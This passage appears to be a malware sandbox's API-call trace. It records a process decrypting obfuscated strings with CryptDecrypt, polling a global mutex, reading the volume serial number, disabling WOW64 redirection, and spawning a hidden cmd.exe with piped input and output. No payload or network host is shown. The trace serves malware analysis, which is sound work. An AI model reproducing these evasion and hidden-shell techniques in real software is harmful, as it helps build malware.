hHeap=0x26a0000) returned 1 [0150.258] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a87c0 | out: hHeap=0x26a0000) returned 1 [0150.258] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0150.259] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8ae0 | out: hHeap=0x26a0000) returned 1 [0150.259] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0150.259] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac32b0) returned 1 [0150.259] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0150.259] CryptDecrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0150.259] CryptDestroyKey (hKey=0xac32b0) returned 1 [0150.259] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0150.259] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2f4 [0150.259] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x0) returned 0x102 [0150.259] CloseHandle (hObject=0x2f4) returned 1 [0150.259] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0150.259] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0150.259] Sleep (dwMilliseconds=0x3e8) [0151.473] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a89a0 [0151.473] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3470) returned 1 [0151.473] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0151.473] CryptDecrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a89a0, pdwDataLen=0x266fbf4 | out: pbData=0x26a89a0, pdwDataLen=0x266fbf4) returned 1 [0151.473] CryptDestroyKey (hKey=0xac3470) returned 1 [0151.473] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a87e8 [0151.473] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8838 [0151.473] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0151.473] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac2d70) returned 1 [0151.473] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0151.473] CryptDecrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0151.473] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.473] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0151.473] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a87e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0151.473] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8838 | out: hHeap=0x26a0000) returned 1 [0151.473] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89a0 | out: hHeap=0x26a0000) returned 1 [0151.473] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0151.473] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a87e8 | out: hHeap=0x26a0000) returned 1 [0151.474] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0151.474] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac32b0) returned 1 [0151.474] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0151.474] CryptDecrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0151.474] CryptDestroyKey (hKey=0xac32b0) returned 1 [0151.474] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0151.474] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2f0 [0151.474] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0x0) returned 0x102 [0151.474] CloseHandle (hObject=0x2f0) returned 1 [0151.474] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0151.474] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0151.474] Sleep (dwMilliseconds=0x3e8) [0152.713] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8a90 [0152.713] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac34b0) returned 1 [0152.713] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0152.713] CryptDecrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8a90, pdwDataLen=0x266fbf4 | out: pbData=0x26a8a90, pdwDataLen=0x266fbf4) returned 1 [0152.713] CryptDestroyKey (hKey=0xac34b0) returned 1 [0152.713] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8ab8 [0152.713] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8b08 [0152.713] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0152.713] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac3330) returned 1 [0152.713] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0152.713] CryptDecrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0152.713] CryptDestroyKey (hKey=0xac3330) returned 1 [0152.713] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0152.713] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8ab8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0152.713] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8b08 | out: hHeap=0x26a0000) returned 1 [0152.713] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a90 | out: hHeap=0x26a0000) returned 1 [0152.713] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0152.714] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8ab8 | out: hHeap=0x26a0000) returned 1 [0152.714] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0152.714] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac3330) returned 1 [0152.714] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0152.714] CryptDecrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0152.714] CryptDestroyKey (hKey=0xac3330) returned 1 [0152.714] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0152.714] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e4 [0152.714] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0x0) returned 0x102 [0152.714] CloseHandle (hObject=0x2e4) returned 1 [0152.714] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0152.714] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0152.714] Sleep (dwMilliseconds=0x3e8) [0153.850] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a87c0 [0153.850] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3030) returned 1 [0153.850] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0153.850] CryptDecrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a87c0, pdwDataLen=0x266fbf4 | out: pbData=0x26a87c0, pdwDataLen=0x266fbf4) returned 1 [0153.850] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.850] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8978 [0153.850] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a89c8 [0153.850] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0153.850] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac33f0) returned 1 [0153.850] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0153.850] CryptDecrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0153.850] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.850] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0153.850] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8978, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0153.850] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89c8 | out: hHeap=0x26a0000) returned 1 [0153.850] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a87c0 | out: hHeap=0x26a0000) returned 1 [0153.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.850] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8978 | out: hHeap=0x26a0000) returned 1 [0153.850] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0153.850] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac3230) returned 1 [0153.850] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0153.851] CryptDecrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0153.851] CryptDestroyKey (hKey=0xac3230) returned 1 [0153.851] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0153.851] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x308 [0153.851] WaitForSingleObject (hHandle=0x308, dwMilliseconds=0x0) returned 0x102 [0153.851] CloseHandle (hObject=0x308) returned 1 [0153.851] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0153.851] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0153.851] Sleep (dwMilliseconds=0x3e8) Thread: id = 78 os_tid = 0xf20 [0134.575] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a12a8 [0134.575] CryptImportKey (in: hProv=0xa968b8, pbData=0x282fd90, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x282fdf8 | out: phKey=0x282fdf8*=0xaa93d0) returned 1 [0134.575] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x282fde0, dwFlags=0x0) returned 1 [0134.575] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x282fdac | out: pbData=0x26a12a8, pdwDataLen=0x282fdac) returned 1 [0134.575] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0134.575] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x14) returned 0x26a12d0 [0134.575] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x14) returned 0x26a1438 [0134.575] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1458 [0134.575] CryptImportKey (in: hProv=0xa968b8, pbData=0x282fd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x282fdd0 | out: phKey=0x282fdd0*=0xaa92d0) returned 1 [0134.575] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x282fdb8, dwFlags=0x0) returned 1 [0134.575] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1458, pdwDataLen=0x282fd84 | out: pbData=0x26a1458, pdwDataLen=0x282fd84) returned 1 [0134.575] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0134.575] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1458 | out: hHeap=0x26a0000) returned 1 [0134.575] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x26a12d0, nSize=0xa | out: lpDst="") returned 0x1c [0134.575] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1438 | out: hHeap=0x26a0000) returned 1 [0134.575] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12d0, Size=0x26) returned 0x26a12d0 [0134.575] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x26) returned 0x26a1438 [0134.575] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1468 [0134.575] CryptImportKey (in: hProv=0xa968b8, pbData=0x282fd64, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x282fdcc | out: phKey=0x282fdcc*=0xaa91d0) returned 1 [0134.575] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x282fdb4, dwFlags=0x0) returned 1 [0134.575] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1468, pdwDataLen=0x282fd80 | out: pbData=0x26a1468, pdwDataLen=0x282fd80) returned 1 [0134.575] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.575] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1468 | out: hHeap=0x26a0000) returned 1 [0134.575] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x26a12d0, nSize=0x13 | out: lpDst="") returned 0x1c [0134.575] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1438 | out: hHeap=0x26a0000) returned 1 [0134.576] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12d0, Size=0x4a) returned 0x26a1438 [0134.576] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4a) returned 0x26a1490 [0134.576] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0134.576] CryptImportKey (in: hProv=0xa968b8, pbData=0x282fd64, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x282fdcc | out: phKey=0x282fdcc*=0xaa93d0) returned 1 [0134.576] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x282fdb4, dwFlags=0x0) returned 1 [0134.576] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x282fd80 | out: pbData=0x26a43c8, pdwDataLen=0x282fd80) returned 1 [0134.576] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0134.576] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0134.576] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x26a1438, nSize=0x25 | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0134.576] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1490 | out: hHeap=0x26a0000) returned 1 [0134.576] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.576] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x50) returned 0x26a12a8 [0134.576] CryptImportKey (in: hProv=0xa968b8, pbData=0x282fd88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x282fdf0 | out: phKey=0x282fdf0*=0xaa92d0) returned 1 [0134.576] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x282fdd8, dwFlags=0x0) returned 1 [0134.576] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x282fda4 | out: pbData=0x26a12a8, pdwDataLen=0x282fda4) returned 1 [0134.576] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0134.576] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.576] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0134.576] Wow64DisableWow64FsRedirection (in: OldValue=0x282fea8 | out: OldValue=0x282fea8*=0x0) returned 1 [0134.576] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.576] CreatePipe (in: hReadPipe=0x282feb4, hWritePipe=0x282feb8, lpPipeAttributes=0x282fe90, nSize=0x0 | out: hReadPipe=0x282feb4*=0x248, hWritePipe=0x282feb8*=0x24c) returned 1 [0134.579] CreatePipe (in: hReadPipe=0x282feb0, hWritePipe=0x282feac, lpPipeAttributes=0x282fe90, nSize=0x0 | out: hReadPipe=0x282feb0*=0x250, hWritePipe=0x282feac*=0x254) returned 1 [0134.579] SetHandleInformation (hObject=0x24c, dwMask=0x1, dwFlags=0x0) returned 1 [0134.579] SetHandleInformation (hObject=0x250, dwMask=0x1, dwFlags=0x0) returned 1 [0134.579] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x282fe3c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254), lpProcessInformation=0x282fe80 | out: lpCommandLine=0x0, lpProcessInformation=0x282fe80*(hProcess=0x25c, hThread=0x258, dwProcessId=0xf30, dwThreadId=0xf34)) returned 1 [0134.614] WriteFile (in: hFile=0x24c, lpBuffer=0x26a1308*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0x282fe9c, lpOverlapped=0x0 | out: lpBuffer=0x26a1308*, lpNumberOfBytesWritten=0x282fe9c*=0xbc, lpOverlapped=0x0) returned 1 [0134.614] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) Thread: id = 79 os_tid = 0xf24 [0134.614] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a12a8 [0134.614] CryptImportKey (in: hProv=0xa968b8, pbData=0x292fe10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x292fe78 | out: phKey=0x292fe78*=0xaa91d0) returned 1 [0134.614] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x292fe60, dwFlags=0x0) returned 1 [0134.614] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x292fe2c | out: pbData=0x26a12a8, pdwDataLen=0x292fe2c) returned 1 [0134.614] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.614] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x14) returned 0x26a12d0 [0134.614] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x14) returned 0x26a1490 [0134.614] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0134.614] CryptImportKey (in: hProv=0xa968b8, pbData=0x292fde8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x292fe50 | out: phKey=0x292fe50*=0xaa91d0) returned 1 [0134.614] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x292fe38, dwFlags=0x0) returned 1 [0134.614] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x292fe04 | out: pbData=0x26a43c8, pdwDataLen=0x292fe04) returned 1 [0134.614] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.614] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0134.614] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x26a12d0, nSize=0xa | out: lpDst="") returned 0x1c [0134.614] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1490 | out: hHeap=0x26a0000) returned 1 [0134.614] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12d0, Size=0x26) returned 0x26a12d0 [0134.614] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x26) returned 0x26a1490 [0134.614] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0134.614] CryptImportKey (in: hProv=0xa968b8, pbData=0x292fde4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x292fe4c | out: phKey=0x292fe4c*=0xaa92d0) returned 1 [0134.615] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x292fe34, dwFlags=0x0) returned 1 [0134.615] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x292fe00 | out: pbData=0x26a43c8, pdwDataLen=0x292fe00) returned 1 [0134.615] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0134.615] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0134.615] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x26a12d0, nSize=0x13 | out: lpDst="") returned 0x1c [0134.615] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1490 | out: hHeap=0x26a0000) returned 1 [0134.615] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12d0, Size=0x4a) returned 0x26a1490 [0134.615] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4a) returned 0x26a14e8 [0134.615] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a43c8 [0134.615] CryptImportKey (in: hProv=0xa968b8, pbData=0x292fde4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x292fe4c | out: phKey=0x292fe4c*=0xaa91d0) returned 1 [0134.615] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x292fe34, dwFlags=0x0) returned 1 [0134.615] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a43c8, pdwDataLen=0x292fe00 | out: pbData=0x26a43c8, pdwDataLen=0x292fe00) returned 1 [0134.615] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.615] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a43c8 | out: hHeap=0x26a0000) returned 1 [0134.615] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x26a1490, nSize=0x25 | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0134.615] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0134.615] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.615] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x50) returned 0x26a14e8 [0134.615] CryptImportKey (in: hProv=0xa968b8, pbData=0x292fe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x292fe70 | out: phKey=0x292fe70*=0xaa92d0) returned 1 [0134.615] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x292fe58, dwFlags=0x0) returned 1 [0134.615] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x292fe24 | out: pbData=0x26a14e8, pdwDataLen=0x292fe24) returned 1 [0134.615] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0134.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.615] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0134.615] 